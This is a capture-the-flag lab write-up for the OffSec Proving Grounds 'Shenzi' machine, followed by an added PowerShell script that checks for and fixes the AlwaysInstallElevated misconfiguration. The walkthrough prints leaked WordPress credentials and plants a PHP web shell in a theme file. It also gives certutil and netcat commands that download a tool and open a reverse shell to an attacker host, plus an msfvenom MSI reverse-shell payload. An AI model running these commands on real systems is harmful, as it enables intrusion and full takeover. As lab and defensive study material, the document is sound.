Shenzi
Writeup for Shenzi from offsec Proving Grounds
Information Gathering
sudo ./nmapAutomator.sh 192.168.85.55 all
Service Enumeration
SMB (Port 445)
We can list the SMB shares to see which share names exist.
We can then download all the files and check whether any of them are useful.
Passwords.txt contains many credentials, which we save for later.
Notice that there are WordPress credentials among them. We can therefore run gobuster against the web server to look for interesting directories.
HTTP (Port 80)
It looks like a basic XAMPP server.
We can run gobuster.
There is a phpmyadmin directory, but we can't really access it.
After more digging and clever brute-forcing, I tried the /Shenzi directory, and we get this page.
Since we know this is a WordPress site, we can try the /wp-admin/ directory, and we get this login page.
From our earlier enumeration of the SMB service, we know that the login credentials are admin:FeltHeadwallWight357. We try these credentials, and we are authenticated.
Exploit
Here, we can navigate to Theme Editor under the Appearance tab. In this tab, we are able to modify PHP code.
We copy and paste the source code from https://github.com/artyuum/Simple-PHP-Web-Shell/blob/master/index.php into the 404.php file. This gives us a web shell whenever the site returns a 404 error, or whenever we navigate to 404.php directly.
Then, we navigate to /404.php (or any other directory that doesn't exist), and we get our web shell.
Next, let's transfer nc.exe to the target machine so that we can use it to gain a reverse shell.
cmd.exe /c certutil -urlcache -split -f http://192.168.49.85:80/opt/windows_nc/nc.exe nc.exe
Next, let's get a reverse shell.
We use the following command in our PHP Web Shell:
nc.exe -e cmd 192.168.49.85 443
Privesc
Next, we can transfer winPEAS onto the target machine and run it.
From winPEAS, we notice that these two registry values are enabled (value is 0x1). This means users of any privilege level can install (execute) *.msi files as NT AUTHORITY\SYSTEM.
Credits - https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
Let's generate a .msi reverse shell file first.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.85 LPORT=21 -f msi > ~/pg/shenzi/shell.msi
After transferring the file and running it, we get SYSTEM.
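The privilege escalation above only works because AlwaysInstallElevated is set to 1 in both the machine-wide and the per-user policy key. The following PowerShell audit script is an added example, not part of the original writeup or of winPEAS: it reports whether the misconfiguration is present on a host and, with the -Remediate switch (a name chosen here), clears it. It assumes it is run from an elevated PowerShell session as the user whose HKCU should be checked.

```powershell
# Added audit script (not from the original writeup): reports whether the
# AlwaysInstallElevated misconfiguration is present and, with -Remediate,
# clears it. Run from an elevated PowerShell session.
param(
    [switch]$Remediate
)

# Windows Installer runs MSI packages as SYSTEM for any user only when BOTH
# the machine-wide (HKLM) and the per-user (HKCU) policy values are 1.
# HKCU is checked for the user running this script.
$paths = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevated {
    param([string]$Path)
    # A missing key or value means the policy is not configured (treated as 0).
    try {
        $item = Get-ItemProperty -Path $Path -Name 'AlwaysInstallElevated' -ErrorAction Stop
        return [int]$item.AlwaysInstallElevated
    } catch {
        return 0
    }
}

$results = foreach ($p in $paths) {
    [pscustomobject]@{
        Path  = $p
        Value = Get-AlwaysInstallElevated -Path $p
    }
}
$results | Format-Table -AutoSize | Out-Host

$vulnerable = ($results | Where-Object { $_.Value -eq 1 }).Count -eq $paths.Count
if ($vulnerable) {
    Write-Warning 'AlwaysInstallElevated is enabled in both HKLM and HKCU: any user can install MSI packages as SYSTEM.'
    if ($Remediate) {
        foreach ($p in $paths) {
            # Setting the value to 0 disables the policy; deleting it has the same effect.
            Set-ItemProperty -Path $p -Name 'AlwaysInstallElevated' -Value 0 -Type DWord
        }
        Write-Output 'AlwaysInstallElevated set to 0 in both hives.'
    }
} else {
    Write-Output 'AlwaysInstallElevated is not enabled in both hives; MSI packages run with the installing user''s rights.'
}
```

Because the policy normally comes from Group Policy, a local fix will be reverted at the next policy refresh unless the GPO itself is corrected.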